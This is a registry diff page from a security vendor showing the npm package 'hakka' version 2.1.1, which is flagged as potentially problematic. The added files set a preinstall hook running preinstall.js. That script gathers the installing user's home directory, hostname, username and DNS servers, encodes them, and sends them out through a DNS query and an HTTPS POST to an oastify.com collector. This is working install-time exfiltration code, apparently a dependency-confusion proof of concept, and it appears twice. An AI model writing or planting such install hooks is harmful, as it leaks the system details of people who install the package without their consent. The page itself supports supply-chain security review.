npm - hakka - Versions diffs - 2.1.1 - Mend

hakka 2.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of hakka might be problematic. Click here for more details.

Files changed (4) hide show

package/package.json ADDED Viewed

@@ -0,0 +1,10 @@
+{
+  "name": "hakka",
+  "version": "2.1.1",
+  "description": "Hakka DC by mjhd0x1",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+         },
+  "author": "mjhd0x1",
+  "license": "ISC"
+}

package/poc/package.json ADDED Viewed

@@ -0,0 +1,15 @@
+{
+  "name": "hakka",
+  "version": "2.1.1",
+  "description": "Hakka DC By mjhd",
+  "author": "mjhd0x1",
+  "scripts": { "preinstall": "node preinstall.js" },
+}

package/poc/preinstall.js ADDED Viewed

@@ -0,0 +1,126 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+// Collect tracking data
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+// Step 1: Hex encode the tracking data
+const hexEncodedData = Buffer.from(trackingData, 'utf8').toString('hex');
+// Step 2: Base64 encode the hex data
+const base64EncodedData = Buffer.from(hexEncodedData, 'utf8').toString('base64');
+// Use Base64 encoded data in DNS query (as an example)
+const dnsQuery = `example.com.${base64EncodedData}.mydomain.com`;
+// Example DNS resolution to exfiltrate the data
+dns.resolve(dnsQuery, (err, addresses) => {
+    if (err) {
+        console.error("Error in DNS resolution:", err);
+    } else {
+        console.log("DNS Addresses:", addresses);
+    }
+});
+// Prepare the data for HTTP POST request
+var postData = querystring.stringify({
+    msg: trackingData, // You might want to send the original tracking data here
+});
+// Prepare HTTP request options
+var options = {
+    hostname: "3fjk638jdzb14dksivqlrp5pagg74ysn.oastify.com", // Replace with Interactsh or Pipedream
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+// Create and send the HTTPS request
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+req.on("error", (e) => {
+    console.error(e);
+});
+req.write(postData);
+req.end();

package/preinstall.js ADDED Viewed

@@ -0,0 +1,126 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+// Collect tracking data
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+// Step 1: Hex encode the tracking data
+const hexEncodedData = Buffer.from(trackingData, 'utf8').toString('hex');
+// Step 2: Base64 encode the hex data
+const base64EncodedData = Buffer.from(hexEncodedData, 'utf8').toString('base64');
+// Use Base64 encoded data in DNS query (as an example)
+const dnsQuery = `example.com.${base64EncodedData}.mydomain.com`;
+// Example DNS resolution to exfiltrate the data
+dns.resolve(dnsQuery, (err, addresses) => {
+    if (err) {
+        console.error("Error in DNS resolution:", err);
+    } else {
+        console.log("DNS Addresses:", addresses);
+    }
+});
+// Prepare the data for HTTP POST request
+var postData = querystring.stringify({
+    msg: trackingData, // You might want to send the original tracking data here
+});
+// Prepare HTTP request options
+var options = {
+    hostname: "3fjk638jdzb14dksivqlrp5pagg74ysn.oastify.com", // Replace with Interactsh or Pipedream
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+// Create and send the HTTPS request
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+req.on("error", (e) => {
+    console.error(e);
+});
+req.write(postData);
+req.end();